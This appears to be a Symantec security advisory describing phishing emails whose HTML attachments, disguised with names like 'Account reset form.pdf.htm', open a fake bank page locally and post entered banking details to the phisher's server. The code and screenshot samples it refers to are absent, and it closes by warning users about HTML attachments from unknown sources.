In the past, we monitored attacks with a similar type of file attachment, but they contained straightforward redirection code. There are different ways to redirect users to the desired location. One of the simpler HTML codes for redirection is shown below:
Sample image of the message:
When the user opens the attachment, the redirection code is executed, thus opening the phishing site. However, this approach has some limitations: even though the phishing link stays hidden in the attachment, when opening with an Internet browser, various anti-fraud tools may catch it and block it.
Contents of the attached HTML file (URL encoded):
Contents of the attached HTML file (decoded):
This file is opened as a “local” HTML file, as shown below:
The address on the browser will show something similar to the examples given below. These links may change according to the user preferences and operating system:
1. If the file is saved on the desktop:
2. If the file is opened directly:
As shown above in the message snapshot, the user is encouraged to open the attachment. Names for the attached file can also be another point of confusion for the user. Some examples of the filenames include:
Account reset form.pdf.htm
Bank-Account confirmation form.pdf.htm
Today, most banks send their account statements in PDF format. Users may think that the attached file is a PDF and subsequently be tricked into opening an HTML file.
In addition, the HTML page shown above looks like an authentic bank home page; however, users may be tricked into entering their bank information (credit card number or bank account details). This data is collected and sent over to the phisher’s server using the HTTP Post Request method. Currently this attack is limited to phishing, but the tactic may easily be used for other malicious activities as well.
Symantec is continuously monitoring this trend and, advises users to be cautious when opening attachments that are an HTML file type, especially when they have arrived from unknown source.